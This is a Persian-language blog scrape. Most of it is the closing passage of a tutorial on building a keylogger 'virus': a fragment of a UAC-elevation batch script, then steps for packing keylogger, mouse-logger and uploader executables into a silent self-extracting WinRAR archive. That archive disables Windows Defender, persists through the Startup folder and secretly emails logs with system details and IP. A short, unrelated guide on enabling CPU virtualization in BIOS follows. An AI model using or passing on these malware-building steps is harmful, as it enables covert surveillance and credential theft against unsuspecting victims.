"runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B`اسم و پسوند فایل را به first.bat تغییر بدید میتونید اسم را چیز دیگه ای بزارید که به مراتب باید در همه بخش های همه فایل ها بازنگری کنید ولی نباید پسوند را تغییر بدید.4-فایل exe که کیلاگر کیبورد بود را به log.exe تغییر نام دهید5-فایل exe که کیلاگر ماوس بود را به mouse.exe تغییر نام دهید6-فایل exe که برای بخش آپلود لاگ بود را به uploader.exe تغییر نام دهید7-تمام فایل های زیر را که ساخته بودیم را به یک پوشه خالی منتقل کنید(بستگی به اسم هایی که گذاشتید میتونه متفاوت باشه من اون چیزی که تو مقاله توضیح دادم را نوشتم):log.exemouse.exeuploader.exefirst.batRun.vbsuploderscript.cmd8-نرم افزار winrar را از لینک زیر نصب کنید و کرک کنید و یا اگر این نرم افزار را از قبل نصب دارید از این مرحله بگذرید (یه نکته نسخه پورتابل را نصب نکنید و اینکه خداوکیلی اگر فارسی نصب کردید برید پاک کنیدش نسخه انگلیسی را نصب کنید فارسیش اصلا خوب نیست???):دانلود WinRAR 6.10.3 Final + Farsi + Portable فشرده سازی فایل (soft98.ir)9-حالا که وین رار نصبه تمام فایل های موجود تو پوشه را با هم انتخاب کنید میتونید با ماوستون این کار را انجام بدید یا با گرفتن کلید کنترل یکی یکی فایل ها را انتخاب کنید.10-حالا روی یکی از فایل های انتخاب شده راست کلیک کنید و دنبال گزینه ای به نام add to archive بگردید و روی آن کلیک کنید و اگر ویندوز شما نسخه 11 میباشد ابتدا گزینه show more options را انتخاب کنید وسپس دنبال add to archive بگردید.11-حالا طبق تصویر زیر گزینه create sfx archive بگردید و تیک آن را فعال کنید و نام فایل مورد نظر برای خروجی نهایی را انتخاب کنید به طور مثال من نام فایل را keylogger.exe قرار داده ام و تاکید میکنم میتوانید نام فایل را تغییر دهید ولی پسوند باید همان exe بماند.12-طبق تصویر به تب Advanced بروید و روی sfx options کلیک کنید.13-در همان تب اول یعنیGeneral طبق تصویر زیر آدرس زیر را جایگزین کنید:C:\Users\Public\publicpass14-به تب Setup بروید و طبق تصویر زیر متن first.bat را در بخش Run after extraction بنویسید.15-حالا به تب Modes بروید و طبق تصویر زیر سایلنت مود را بر روی Hide all تنظیم کنید.16-طبق تصویر زیر به تب Update بروید و آپدیت مود را روی Extract and replace files تنظیم کنید و اور رایت مود را بر روی Overwrite all files تنظیم کنید.17-اگر آیکون خاصی مد نظر دارید به تب text and icon بروید و از بخش Load sfx logo from the file آیکون خود را برای فایل exe نهایی انتخاب کنید گزینه های دیگر به دلیل ماهیت مخفی اجرا شدن ویروس ما کاربرد ندارند.18-حال دکمه ok را فشار دهید و در صفحه بعدی هم دکمه ok را فشار دهید.دکمه ok را بزنیددوباره دکمه ok را بزنید19-تمام حالا کافیه به پوشه ای که فایل ها را داخلش ریخته بودید برید و میبینید که یک فایل exe جدید اونجا به وجود اومده که اون ویروس کیلاگر نهایی و کاملا اصولی شماست کافیه در سیستم هدف آنتی ویروس را خاموش کنید و بعد از اون ویروس ما اجرا بشه و شخص هدف ما ران از ادمینستریتور خودکاری که براش ارسال میشه را قبول کنه تا ویروس ما عمل کنه و هر ده دقیقه یکبار(میتونید طبق توضیحات اسکریپت ها کم یا زیاد تر کنید این تایم را)لاگ ارسال میشه پیشنهاد میکنم رو سیستم خودتون تست نکنید چون بعد از اینکه ران از ادمینستریتور را قبول کنید سطح امنیت سیستم شما از صفر هم تقریبا کمتر میشه.حالا اصلا این ویروس کیلاگر ما چجوری کار میکنه؟برای اجرا باید آنتی ویروس موقتا خاموش شده باشه و اگر از برنامه نویسی سررشته داشته باشید احتمالا تا الان فهمیدید که وقتی فایل exe نهایی کیلاگر را اجرا میکنید ازتون درخواست دسترسی ادمین میکنه در صورتی که قبول نکنید کلا عملیات را کنسل میکنه ولی اگر قبول بکنید آنتی ویروس خاموش میشه و دیگه قابل روشن کردن نیست(بعد از اولین ریستارت و فقط برای آنتی ویروس پیش فرض ویندوز)و فایلهایی که نوشتیم جایگذاری میشوند سر جاهای خاص خودشون و سیستم خودکار ریستارت میشه فایل های مورد نیاز ما در پوشه استارت آپ ویندوز کپی شدند و به محض روشن شدند ویندوز اجرا میشوندو بعد از اون کاربر دیگه هیچی نمیبینه و بدون اینکه بفهمه برای ما فایل های لاگ به صورت خودکار ارسال میشه برای تشخیص اینکه کدوم لاگ از کدوم کامپیوتر به ایمیل ما ارسال شده هم گزینه ای قرار دادیم تا مشخصات سیستم را در فایل لاگ ما قرار بده این مشخصات تمام چیز هایی هستند که در بخش about ویندوز دیده میشوند و تعدادی چیز های اضافه تر از جمله آی پی و اطلاعات داخلی ویندوز.امیدوارم این پست به دردتون خورده باشه ببخشید اگر طولانی شد نیاز بود که یه سری مباحث گفته بشه تا یه کیلاگر کاملا عالی و بی نقص از آب در بیاریم اگر خوشتون اومد ممنون میشم پست را لایک کنید تا از من یه حمایتی بشه?پایان

آموزش فعال کردن قابلیت مجازی سازی یا ورچوالیزیشن (Intel VT-x ، AMD-V ، Intel-V) در CPU

محمد امامی — Tue, 23 Nov 2021 14:41:03 +0330

شاید شما هم تا به حال این مشکل برایتان پیش آمده باشه که نرم افزار ها موقع اجرا شدن ارور فعال نبودن مجازی سازی یا virtualization میدهند پس با با ما همراه باشید تا رفع این ارور و فعال کردن قابلیت مجازی سازی cpu شما در بایوس uefi را آموزش دهیم.ارور نرم افزار VMware در مورد خاموشی مجازی سازی پردازشگر https://virgool.io/p/fbhu3eigqnna/%D8%AF%D8%B1%D8%B5%D9%88%D8%B1%D8%AA%DB%8C%DA%A9%D9%87%D8%A8%D8%A7%D8%A7%D8%B1%D9%88%D8%B1%D9%87%D8%A7%DB%8C%D8%B2%DB%8C%D8%B1%D9%85%D9%88%D8%A7%D8%AC%D9%87%D8%B4%D8%AF%DB%8C%D8%AF%DB%8C%D8%B9%D9%86%DB%8C%D9%82%D8%A7%D8%A8%D9%84%DB%8C%D8%AA%D9%85%D8%AC%D8%A7%D8%B2%DB%8C%D8%B3%D8%A7%D8%B2%DB%8CCPU%D8%B4%D9%85%D8%A7%D8%BA%DB%8C%D8%B1%D9%81%D8%B9%D8%A7%D9%84%D8%A7%D8%B3%D8%AA%D9%BE%D8%B3%D8%A7%DB%8C%D9%86%D9%85%D9%82%D8%A7%D9%84%D9%87%D8%B1%D8%A7%D8%AF%D9%86%D8%A8%D8%A7%D9%84%DA%A9%D9%86%DB%8C%D8%AF: host supports Intel VT-x, but Intel VT-x is disabledVT-x/AMD-V hardware acceleration is not available on your systemThe processor on this computer is not compatible with Hyper-Vبرای اجرای نرم افزارهای مجازی ساز باید مادربورد شما از این قابلیت پشتیبانی کرده و فعال شده باشد. این قابلیت نام‌های متفاوتی می‌تواند داشته باشد:Intel VT-xIntel-VAMD-VSVM SupportV-SupportVirtualization TechnologyIntel Virtualization TechnologyVirtualization ExtensionsVanderpoolVirtual machin modeدر پردازنده‌های AMD معمولا این قابلیت به صورت پیشفرض فعال است ولی در پردازنده‌های Intel باید این قابلیت به صورت دستی فعال شود. به Bios خود رفته و یکی از نام‌های بالا و یا شاید نامی مشابه نام‌های بالا را بیابید و فعال کنید.چند حالت از این گزینه را در تنظیمات Bios ببینید:نظرات و مشکلات خود را میتوانید کامنت کنید و در اسرع وقت پاسخ داده خواهد شد.